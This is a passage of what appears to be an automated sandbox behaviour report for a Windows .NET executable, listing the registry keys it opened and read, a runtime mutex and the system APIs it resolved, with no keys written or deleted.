HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.0.0.d3.resources_it-IT_96cbd02afd56cf46 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\afbae67\87e05e7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.0.0.d3.resources_it_96cbd02afd56cf46 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\afbae67\41529c91 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.0.0.{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}__3e56350693f7355e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\433351e7\2db83a0b HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\i1.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B21A317C HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B21A317C HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Write Keys
Nothing to display
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle 